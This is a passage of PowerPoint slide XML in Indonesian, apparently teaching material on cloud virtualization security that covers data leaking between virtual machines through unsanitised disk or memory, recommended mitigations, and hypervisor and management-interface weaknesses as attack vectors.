              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tervirtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibersihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bocor di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialokasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh VM lain, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, VM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sanitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyeluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siklus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hidup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memisahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada hypervisor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hypervisor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkompromikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual (VM) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalamnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hypervisor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tervirtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
